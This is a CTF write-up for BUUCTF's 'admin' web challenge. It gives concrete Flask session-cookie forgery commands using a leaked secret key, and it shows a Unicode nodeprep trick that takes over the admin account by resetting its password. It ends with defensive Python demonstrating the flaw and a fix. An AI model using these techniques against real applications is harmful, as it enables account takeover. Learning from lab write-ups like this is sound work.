Challenge description
The challenge comes from BUUCTF.
Unintended solution (pure luck)
The challenge is named admin, so it should be about logging in as admin.
This is also confirmed in the source code.
I tried passwords at random on the login page, and when I entered 123 it logged in!!!
So brute force would also get the flag, but given the difficulty of BUUCTF web challenges it cannot be that simple, so I looked up writeups, combined several of them, learned a lot, and record it here.
Flask session forgery (also an unintended solution)
Flask stores the session in the client-side cookie, that is, locally. We can modify the session to forge the admin user.
There is a ready-made script for this on GitHub: flask_session_cookie_manager.
But the session is protected with a secret key, so we need to know that key before we can modify the session.
Finding the secret key
After registering an account and logging in, the password change page reveals the git source code.
Download it and find the secret key in config.py.
Forging the session
Then we can forge the session with the script.
First decode the original session:
python3 flask_session_cookie_manager3.py decode -s "ckj123" -c ".eJw9kMGKwjAQhl9lmbOHbZuT4EFIt2whEwpTy-Qirq0mqXGhKtqI775VFk8D__fzDTN3WO-G7mRhfh4u3QzWroX5HT5-YA7YVAk2amRCz7FPlVQCCyU4_QrGo9XSOKS9UN5YDqseJaco-9uUZVqWjklFDtOMedQyv2qqMlPkV-ON51BHLMrA0QZTrJx6OqkNnNbTzjxTTTX1sMenI1YjFsbqphaKeNQNZ-hLr2krmFpn5HIBjxlsT8Nuff7tu-P7BE15ogu0iozTzXdkvxSY5qMie-C4F0aW1pBKkaqIobpxPHi8Ll46Fzb77m2qDytU_-S4CROABGZwOXXD62eQfMLjD-mobCE.Xq5sUg.8y1k1rWI_KY5cx0H4qGeLmOYtLw"
Then change the name to admin and encode it again:
python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, 'name': 'admin', 'image': b'RUM3', 'user_id': '10', '_id': b'5d55c2a3cc960384c8caff3a86b58826abed46649158782ba33bbbc13810947da0f6cbe34bfc8fdeb3afe7fce55a71d0f3d533c424fa9e81629f762c978a7bd0', 'csrf_token': b'9158ca16b9b3b087a218ec88d2ae365436d1c9c7'}"
The original session looks like this.
Replace the session on the left with the one generated above.
The admin user is forged successfully and we get the flag.
Unicode deception (intended solution)
This is actually the challenge author's intended solution, but the code written at the time was not rigorous, which led to many unintended solutions.
Reading the source code, we find that a custom strlower function is used to convert the username to lowercase during registration, login and password modification:
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep  # import used by the challenge source

def strlower(username):
    # not a plain .lower(): XMPP nodeprep does a stringprep mapping plus NFKC normalization
    username = nodeprep.prepare(username)
    return username
The nodeprep.prepare function has a flaw: it is not idempotent.
For the character ᴬ, calling the function once converts it to A, and calling it again converts it to a.
So we register a user named ᴬdmin and log in normally; the home page shows our username as Admin.
If we then change the password as Admin, strlower is called first and converts Admin to admin, so we are actually changing admin's password.
Then we can log in as admin with the password we just set.
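To show why the second call matters, here is an added example (not code from the challenge or from twisted) that models the flow above with an in-memory user store. canon_twopass is a simplified, hypothetical stand-in for the nodeprep pipeline (per-character lowercase mapping, then NFKC) that reproduces the ᴬ → A → a behaviour; canon_idempotent is the defensive order (NFKC first, then casefold), and is_idempotent is the check a code reviewer would add to the test suite.

```python
import unicodedata


def canon_twopass(name):
    """Model of the challenge's strlower: per-character lowercase mapping,
    then NFKC. Hypothetical stand-in, not twisted's nodeprep. Not idempotent:
    NFKC can emit a new upper-case letter after the case mapping already ran."""
    mapped = "".join(ch.lower() for ch in name)
    return unicodedata.normalize("NFKC", mapped)


def canon_idempotent(name):
    """Defensive order: compatibility-normalize first, then casefold."""
    return unicodedata.normalize("NFKC", name).casefold()


def is_idempotent(canon, samples):
    """Regression check: canonicalizing twice must equal canonicalizing once."""
    return all(canon(canon(s)) == canon(s) for s in samples)


class UserStore:
    """Minimal model of the app: the name is canonicalized at registration
    and again at password change, exactly the pattern described above."""

    def __init__(self, canon):
        self.canon = canon
        self.passwords = {}  # canonical name -> password

    def register(self, username, password):
        key = self.canon(username)
        if key in self.passwords:
            return None  # name already taken
        self.passwords[key] = password
        return key  # this is the name that ends up in the session

    def change_password(self, session_name, new_password):
        key = self.canon(session_name)  # second canonicalization
        if key not in self.passwords:
            return None
        self.passwords[key] = new_password
        return key  # the account that was really changed


def run_scenario(canon):
    """Constructed data: an existing admin account and a registration of 'ᴬdmin'."""
    store = UserStore(canon)
    store.register("admin", "admin-secret")
    shown = store.register("\u1d2cdmin", "123")  # U+1D2C MODIFIER LETTER CAPITAL A
    changed = store.change_password(shown, "new-password") if shown else None
    return {"registered_as": shown, "changed": changed, "admin_pw": store.passwords["admin"]}
```

With canon_twopass the registration is accepted as "Admin" and the password change lands on "admin"; with canon_idempotent the registration collides with the existing admin account and is refused.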
Closing remarks
Although the challenge author was careless, we still learned a lot of tricks from it, so let's keep going!